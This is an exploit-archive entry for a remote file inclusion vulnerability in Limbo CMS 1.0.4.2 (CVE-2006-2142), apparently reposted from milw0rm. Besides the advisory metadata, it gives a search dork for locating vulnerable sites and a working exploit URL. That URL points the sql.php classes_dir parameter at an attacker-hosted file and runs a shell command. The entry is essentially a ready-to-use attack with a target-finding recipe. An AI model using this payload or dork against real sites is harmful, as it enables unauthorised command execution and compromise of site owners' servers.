Limbo CMS 1.0.4.2 - 'sql.php' Remote File Inclusion



EKU-ID: 9760 CVE: OSVDB-25155;CVE-2006-2142 OSVDB-ID:
Author: [Oo] Published: 2006-04-29 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Title: Limbo CMS <= 1.04 Remote File Inclusion
URL: http://www.limbo-cms.com/
Dork: inurl:"index2.php?option=rss" OR "powered By Limbo CMS"
Credits: [Oo]

Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-04-29]